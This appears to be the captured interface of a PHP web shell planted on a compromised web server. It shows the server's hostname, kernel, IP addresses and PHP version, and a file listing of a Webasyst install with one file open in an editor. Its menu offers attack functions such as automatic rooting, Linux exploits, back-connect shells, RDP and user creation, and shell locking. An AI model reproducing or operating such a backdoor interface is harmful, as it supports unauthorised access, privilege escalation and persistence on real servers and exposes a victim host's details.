Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
webasyst /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
.htaccess
14
B
-rw-r--r--
SystemConfig.class.php
157
B
-rw-r--r--
_.htaccess
1.49
KB
-rw-r--r--
_htaccess
142
B
-rw-r--r--
_thumb.php
193
B
-rw-r--r--
all_fields_order.php
398
B
-rw-r--r--
apps.php
237
B
-rw-r--r--
company_fields_order.php
567
B
-rw-r--r--
config.php
158
B
-rw-r--r--
custom_fields.php
29.3
KB
-rw-r--r--
db.php
271
B
-rw-r--r--
edit.php
4.22
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
189
B
-rw-r--r--
import.php
2.89
KB
-rw-r--r--
info.xml
3.42
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
15.41
KB
-rw-r--r--
install.xml
1007
B
-rw-r--r--
mail.php
81
B
-rw-r--r--
md5
3.5
KB
-rw-r--r--
notes.txt
1.28
KB
-rw-r--r--
person_fields_order.php
1.52
KB
-rw-r--r--
plugins.php
95
B
-rw-r--r--
robots.txt
214
B
-rw-r--r--
routing.php
1.25
KB
-rw-r--r--
search.php
34.87
KB
-rw-r--r--
services.php
3.76
KB
-rw-r--r--
thumb.php
187
B
-rw-r--r--
update_antibot.php
2.67
KB
-rw-r--r--
waid.php
615
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_antibot.php
<?php @unlink('update_antibot.php'); function __getRandomHexString($length = 64) { if (!__wa_is_int($length) || $length <= 0) { $length = 64; } // we will bin2hex and byte is 2 hex digit, so make a little correction and than, before method returns, make correction back $is_even = $length % 2 === 0; if (!$is_even) { $length += 1; } if (function_exists('random_bytes')) { try { $result = bin2hex(random_bytes($length / 2)); // make a correction back if (!$is_even) { $result = substr($result, 1); } return $result; } catch (Exception $e) { } } if (function_exists('openssl_random_pseudo_bytes')) { $result = openssl_random_pseudo_bytes($length / 2); if ($result) { $result = bin2hex($result); // make a correction back if (!$is_even) { $result = substr($result, 1); } return $result; } } $bytes = []; if (function_exists('random_int')) { $fn = 'random_int'; } elseif (function_exists('mt_rand')) { $fn = 'mt_rand'; } else { $fn = 'rand'; } for ($i = 0, $n = $length / 2; $i < $n; $i++) { $bytes[] = chr($fn(0, 255)); // gen one byte } $bytes = join('',$bytes); $result = bin2hex($bytes); // make a correction back if (!$is_even) { $result = substr($result, 1); } return $result; } function __wa_is_int($val) { // check against objects to avoid nasty object to int conversion errors if (!is_numeric($val)) { return false; } // Test for very large integers if (function_exists('ctype_digit')) { $val = (string) $val; if (ctype_digit($val)) { return true; } else if ($val && $val[0] == '-' && ctype_digit(substr($val, 1))) { return true; } } // typecast trick works fine for anything else except boolean true return ($val !== true) && ((string)(int) $val) === ((string) $val); } $empty_field_name = serialize('!f'. __getRandomHexString(6)); $filled_field_name = serialize('!f'. __getRandomHexString(6)); $filled_field_value = serialize(__getRandomHexString(32)); echo '<empty_field_name>'.$empty_field_name.'</empty_field_name>'; echo '<filled_field_name>'.$filled_field_name.'</filled_field_name>'; echo '<filled_field_value>'.$filled_field_value.'</filled_field_value>'; ?>
Close